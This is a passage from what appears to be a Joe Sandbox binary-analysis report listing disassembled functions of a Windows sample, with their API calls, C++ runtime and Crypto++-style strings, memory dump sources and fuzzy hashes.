                                      • Instruction ID: cf5a90c86461f6426003bcd8ab6ce59521723eeadb8d7262c51d617b326c31bc
                                      • Opcode Fuzzy Hash: 0e2ad9ad0f529ceb7d1f3b2053d8e162d84bd39bf9d06b74820b7b1f5bbd4add
                                      • Instruction Fuzzy Hash: 43418831900209AFCF16CF99CC81AEEBBB9BF48301F188159FD18A7221D7359A54DF61
                                      Function 0093722E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3_GS.LIBCMT ref: 00937235
                                        • Part of subcall function 0092BA2F: __EH_prolog3.LIBCMT ref: 0092BA36
                                        • Part of subcall function 0092BA2F: std::_Lockit::_Lockit.LIBCPMT ref: 0092BA40
                                        • Part of subcall function 0092BA2F: std::_Lockit::~_Lockit.LIBCPMT ref: 0092BAB1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~_
                                      • String ID: %.0Lf$0123456789-
                                      • API String ID: 2728201062-3094241602
                                      • Opcode ID: dd590ee8c9f9db0d0a1e34082f40b7eb893f534ece80e819ed543bc3b8dd612c
                                      • Instruction ID: 40c9a8c37b578267a462f489ad0319baddfd57c02af8c8c3146cc9afd1f2a861
                                      • Opcode Fuzzy Hash: dd590ee8c9f9db0d0a1e34082f40b7eb893f534ece80e819ed543bc3b8dd612c
                                      • Instruction Fuzzy Hash: 9241797190021ADFCF15DFD8C881AEEBBB6FF98314F144059E810AB255DB30AA56CFA1
                                      Function 009374CE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3_GS.LIBCMT ref: 009374D5
                                        • Part of subcall function 008ECC80: std::_Lockit::_Lockit.LIBCPMT ref: 008ECCCC
                                        • Part of subcall function 008ECC80: std::_Lockit::_Lockit.LIBCPMT ref: 008ECCEE
                                        • Part of subcall function 008ECC80: std::_Lockit::~_Lockit.LIBCPMT ref: 008ECD0E
                                        • Part of subcall function 008ECC80: std::_Lockit::~_Lockit.LIBCPMT ref: 008ECE0C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                      • String ID: 0123456789-$0123456789-
                                      • API String ID: 2088892359-2494171821
                                      • Opcode ID: 49a6937ba954cb0a17994cf48924dbfd69c9f3b208b4827211a865de107d53e7
                                      • Instruction ID: 6f77a45bc6d0c780a235cbac6ac75dfe1e9141917873d106140fad13b17c0cd7
                                      • Opcode Fuzzy Hash: 49a6937ba954cb0a17994cf48924dbfd69c9f3b208b4827211a865de107d53e7
                                      • Instruction Fuzzy Hash: 93414771A1021ADFCF19DF98C881AEEBBB6FF49314F144059E401AB255DB30AA56CFA1
                                      Function 008FF250 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 98COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008FF34B
                                      Strings
                                      • InputBuffer, xrefs: 008FF2B1
                                      • StringStore: missing InputBuffer argument, xrefs: 008FF325
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: InputBuffer$StringStore: missing InputBuffer argument
                                      • API String ID: 2005118841-2380213735
                                      • Opcode ID: a664aa71c6ef722aad449da49a76b60ce2726a0da75bccdd006cf8b30d9c6272
                                      • Instruction ID: 00c0605b82f4c26ac03c200356c25eb8356197410a5bbe4ba74058f5e1ae733d
                                      • Opcode Fuzzy Hash: a664aa71c6ef722aad449da49a76b60ce2726a0da75bccdd006cf8b30d9c6272
                                      • Instruction Fuzzy Hash: 50315A71A04748DFDB10DFA8D854B9EBBF8FF89714F108169E415AB380DB74AA08CB90
                                      Function 0098285A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: __dosmaperr_free
                                      • String ID: SystemRoot
                                      • API String ID: 3116789124-2034820756
                                      • Opcode ID: 99cbd4f604e510aaf43efbc78a89017ee4a8d7533cf572568847b0e1f69e1b88
                                      • Instruction ID: 4ebfaad50ec713c8adc97b92fb217e8f9785578d7db66972cb0fa33e5f0db3a1
                                      • Opcode Fuzzy Hash: 99cbd4f604e510aaf43efbc78a89017ee4a8d7533cf572568847b0e1f69e1b88
                                      • Instruction Fuzzy Hash: 22213D326042119FEF19AF28C840B7977A9EFC6720F19815DF8459B342C6769D018750
                                      Function 00918040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00918114
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: Resynchronize$key is set
                                      • API String ID: 2005118841-370131452
                                      • Opcode ID: 7374bf81227b27b84940f0121ef2bac115df314c8ccae89cdecd6adf502f88b1
                                      • Instruction ID: 45248d20e516410d6cc4d5fd073b5dbc68d49081425238efbb1f7f5260bcef38
                                      • Opcode Fuzzy Hash: 7374bf81227b27b84940f0121ef2bac115df314c8ccae89cdecd6adf502f88b1
                                      • Instruction Fuzzy Hash: 93314DB160460AAFDB00DF61C989B9BFBB9FB88314F404519E81597A80DBB5A428CF90
                                      Function 0097EB69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0097EDC4,00000000,00000050,?,?,?,?,?), ref: 0097EC44
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ACP$OCP
                                      • API String ID: 0-711371036
                                      • Opcode ID: e04e89240a7d51dd4a259c1288c45467d367a3f78ffb16d16c5d2ecd00e312cb
                                      • Instruction ID: 311c0064de9fe4bd7789d881ef6dfbc758f86bba24ec621ce036573cd8d47ec1
                                      • Opcode Fuzzy Hash: e04e89240a7d51dd4a259c1288c45467d367a3f78ffb16d16c5d2ecd00e312cb
                                      • Instruction Fuzzy Hash: EE21B3A7A04204A6D7358A65C901BA777AEEB5CB25F5EC4E4F94ED7240F732DE40C390
                                      Function 008B60C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008B610E
                                        • Part of subcall function 00958621: RaiseException.KERNEL32(?,?,00925B8C,?,?,Dflt,?,?,?,?,?,00925B8C,?,009C9A70,?), ref: 00958681
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 008B6162
                                      Strings
                                      • Clone() is not implemented yet., xrefs: 008B60E5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ExceptionException@8RaiseThrow___std_exception_copy
                                      • String ID: Clone() is not implemented yet.
                                      • API String ID: 640887848-226299721
                                      • Opcode ID: 7457c8c4167c4bf56a942a7c02f173ea3042804c07415a01763e2cbbe200f64c
                                      • Instruction ID: 48519e7f6fa8021e53c1b2bfcc61002605dc1f18538568a52b267c8ebe0855b0
                                      • Opcode Fuzzy Hash: 7457c8c4167c4bf56a942a7c02f173ea3042804c07415a01763e2cbbe200f64c
                                      • Instruction Fuzzy Hash: 24217FB1914608ABC711DF59CC41F9AF7FCFB49714F10862AE811E3780EB74AA088BA0
                                      Function 009382CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: H_prolog3___cftoe
                                      • String ID: !%x
                                      • API String ID: 855520168-1893981228
                                      • Opcode ID: 3791157bf6d603bef48383ec395dd17e71ee3190509adf2e7bbd379c94382800
                                      • Instruction ID: 15115e39ba555cdd3841def1bad4c453109fe9ffb7a6041bf82781175a052a8d
                                      • Opcode Fuzzy Hash: 3791157bf6d603bef48383ec395dd17e71ee3190509adf2e7bbd379c94382800
                                      • Instruction Fuzzy Hash: 5B214671D01209EBCF04EF94E892AEEB7B6FF48704F504418F905AB251EB75AA15CFA0
                                      Function 009383A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: H_prolog3___cftoe
                                      • String ID: !%x
                                      • API String ID: 855520168-1893981228
                                      • Opcode ID: 692e044410a7a89c0484f969425e6a68f47b1ec5dbf04e563b2c6c105f1dfdbc
                                      • Instruction ID: dcaad2692d0b3fb438dfe9877b61a6ff937b0ecfd9972ceb2746b0869229d55e
                                      • Opcode Fuzzy Hash: 692e044410a7a89c0484f969425e6a68f47b1ec5dbf04e563b2c6c105f1dfdbc
                                      • Instruction Fuzzy Hash: 34214671D0120AEBCF00EF94D891AEEB7B6FF48304F114428F905AB251DB756A15CFA0
                                      Function 008B2980 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 008B29AB
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 008B29FA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                      • String ID: bad locale name
                                      • API String ID: 3988782225-1405518554
                                      • Opcode ID: b8cafadac2ffdd36b029deedd3c13e1a3dd5bae417dccca22e3e71fa26dcde20
                                      • Instruction ID: 0c7c6866800437b0467455e603fa26c81e962fc635ef7b43ee153539e071c76c
                                      • Opcode Fuzzy Hash: b8cafadac2ffdd36b029deedd3c13e1a3dd5bae417dccca22e3e71fa26dcde20
                                      • Instruction Fuzzy Hash: 23119E71904B54DFD320CF69C901B47BBE4EB19710F008A1EE899C3B81D7B5A508CB91
                                      Function 0092A6BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • SetLastError.KERNEL32(0000000D,?,00925A30,00000001,?,008B379A,00000000,?,008B2567,009DF6C0,008EED20,009DF6EC,?,008B379A,?,00000001), ref: 0092A73E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorLast
                                      • String ID: ios_base::failbit set
                                      • API String ID: 1452528299-3924258884
                                      • Opcode ID: 0e7d3ea292754df71f5e668b29315f5a9766df66b07b26ccc6ac13c4a3f2d812
                                      • Instruction ID: d4df58b27fba4451fe732f12447dacf1a42df8ce41ea5ea9e1d7b22aae8fdc36
                                      • Opcode Fuzzy Hash: 0e7d3ea292754df71f5e668b29315f5a9766df66b07b26ccc6ac13c4a3f2d812
                                      • Instruction Fuzzy Hash: E211E133618125AFCF125F65FC4496ABBBDFF08754F01803AF90586220DB709C50ABE2
                                      Function 008E0970 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008E09EF
                                      Strings
                                      • OutputStringPointer, xrefs: 008E09A2
                                      • StringSink: OutputStringPointer not specified, xrefs: 008E09C6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
                                      • API String ID: 2005118841-1331214609
                                      • Opcode ID: bce6f42d1f83e1243fa2af5643a5c51800c937feec1e623cf4d343b415e7853d
                                      • Instruction ID: 6dcda7ecb93791b8c44811f8125c070d934626139bf195e56b11db42b79b13d6
                                      • Opcode Fuzzy Hash: bce6f42d1f83e1243fa2af5643a5c51800c937feec1e623cf4d343b415e7853d
                                      • Instruction Fuzzy Hash: 70018F71945608EBDB00EF94CD42FDEB7BCEB49B14F10856AE811E3391DB75A9058B90
                                      Function 0094F628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0094F670
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0094F67E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                      • String ID: pContext
                                      • API String ID: 1687795959-2046700901
                                      • Opcode ID: c63467bbf285dafe4b88cc26728f84c112e5f15e2d33878f0daaf3b2a1fd0f57
                                      • Instruction ID: 8eaa7db6f10b5aba14c04b5f569ad6385399b62bf6083225a5247bd101d53acb
                                      • Opcode Fuzzy Hash: c63467bbf285dafe4b88cc26728f84c112e5f15e2d33878f0daaf3b2a1fd0f57
                                      • Instruction Fuzzy Hash: 34F0B435B00618AB8B04EBA9D899D5EB7AC9FC8B647414166E901E7351DB70ED018BD0
                                      Function 00960876 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: NameName::
                                      • String ID: {flat}
                                      • API String ID: 1333004437-2606204563
                                      • Opcode ID: bf5518999f737cf2203faf01a2802fcdd9f98b3d0e89ec868c6c4a651d7fc80f
                                      • Instruction ID: 5e205972ce80d1786ca2b6e69d5fd0f9601bdca3eb9913d6fce73cf2153fa5f6
                                      • Opcode Fuzzy Hash: bf5518999f737cf2203faf01a2802fcdd9f98b3d0e89ec868c6c4a651d7fc80f
                                      • Instruction Fuzzy Hash: CDF03071155308DFDB10DF59D495BAA3BD4DB81316F088445E94C0F292CB7598C0C790
                                      Function 00952F49 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00952F68
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00952F76
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                      • String ID: pThreadProxy
                                      • API String ID: 1687795959-3651400591
                                      • Opcode ID: 8067c17a18c0c57ea0d1f2fc3011eb5116e8d046addf79f7b62ff62240a654f3
                                      • Instruction ID: 2668626d63b05d2517d45030ef6f95d177beab9d7cb5a2978c2717c3521da323
                                      • Opcode Fuzzy Hash: 8067c17a18c0c57ea0d1f2fc3011eb5116e8d046addf79f7b62ff62240a654f3
                                      • Instruction Fuzzy Hash: 3ED05E71D00208AACB00EBA9E84BF8E73AC9B40B48F1081786D11A604AEA70E508CBA0
                                      Function 009597B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 009597C1
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 009597E8
                                        • Part of subcall function 00958621: RaiseException.KERNEL32(?,?,00925B8C,?,?,Dflt,?,?,?,?,?,00925B8C,?,009C9A70,?), ref: 00958681
                                      Strings
                                      • Access violation - no RTTI data!, xrefs: 009597B8
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                      • String ID: Access violation - no RTTI data!
